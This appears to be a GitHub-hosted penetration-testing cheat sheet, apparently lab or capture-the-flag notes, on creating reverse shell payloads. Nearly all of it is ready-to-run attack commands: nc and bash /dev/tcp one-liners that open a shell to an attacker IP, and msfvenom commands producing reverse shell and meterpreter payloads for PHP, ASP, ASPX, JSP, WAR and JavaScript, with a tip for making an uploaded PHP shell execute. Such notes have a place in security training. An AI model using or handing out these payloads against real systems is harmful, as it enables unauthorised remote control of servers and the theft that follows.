-
Notifications
You must be signed in to change notification settings - Fork 14
Create reverse shell payload
- Common webshell in Kali: /usr/share/webshells
- Ref: https://www.offensive-security.com/metasploit-unleashed/msfvenom/
- msfvenom -a x86 --platform Windows ...
- List payload: msfvenom -l payloads
- -i 10: 10 iterations
- -s maximum_bytes.
- -v shell_code_variable
- Program payload and executable payload: here
- http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
- URL encode: https://www.url-encode-decode.com/
- (Tested - OK for PHP)
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.20 5678 >/tmp/f bash -i >& /dev/tcp/10.0.0.1/5678 0>&1
Refs:
PHP special reverse shell
- https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php
- One liner code of the above at https://alamot.github.io/nineveh_writeup/#getting-shell
- To change it and use LFI to remote execute it.
Web:
- PHP:
msfvenom -p php/reverse_php LHOST=Attacker_IP LPORT=Attacker_Listener_Port -f raw > shell.php - (Not allowed) PHP 2:
msfvenom -p php/meterpreter_reverse_tcp LHOST=Attacker_IP LPORT=Attacker_Listener_Port -f raw > shell.php
- Then we need to add the <?php at the first line of the file so that it will execute as a PHP webpage:
cat shell.php | pbcopy && echo '<?php ' | tr -d 'n' > shell.php && pbpaste >> shell.php
-
ASP 1: (Unstaged - Can use nc)
msfvenom -p windows/shell_reverse_tcp LHOST=Attacker_IP LPORT=4444 -f asp > shell.asp -
ASP 2: (Staged - Need Metasploit multi handler) msfvenom -p windows/shell/reverse_tcp LHOST=Attacker_IP LPORT=4444 -f asp > shell.asp
-
ASP.NET: (Can use nc. Tested)
msfvenom -p windows/shell_reverse_tcp LHOST=Attacker_IP LPORT=6789 -f aspx > myshell.aspx -
(Not allowed) ASP:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=Attacker_IP LPORT=Attacker_Listener_Port -f asp > shell.asp -
JSP:
msfvenom -p java/jsp_shell_reverse_tcp LHOST=Attacker_IP LPORT=Attacker_Listener_Port -f raw > shell.jsp -
WAR:
msfvenom -p java/jsp_shell_reverse_tcp LHOST=Attacker_IP LPORT=Attacker_Listener_Port -f war > shell.war -
Unicode JS:
msfvenom -p windows/shell_reverse_tcp LHOST=Attacker_IP LPORT=Attacker_Listener_Port -f js_le -e generic/none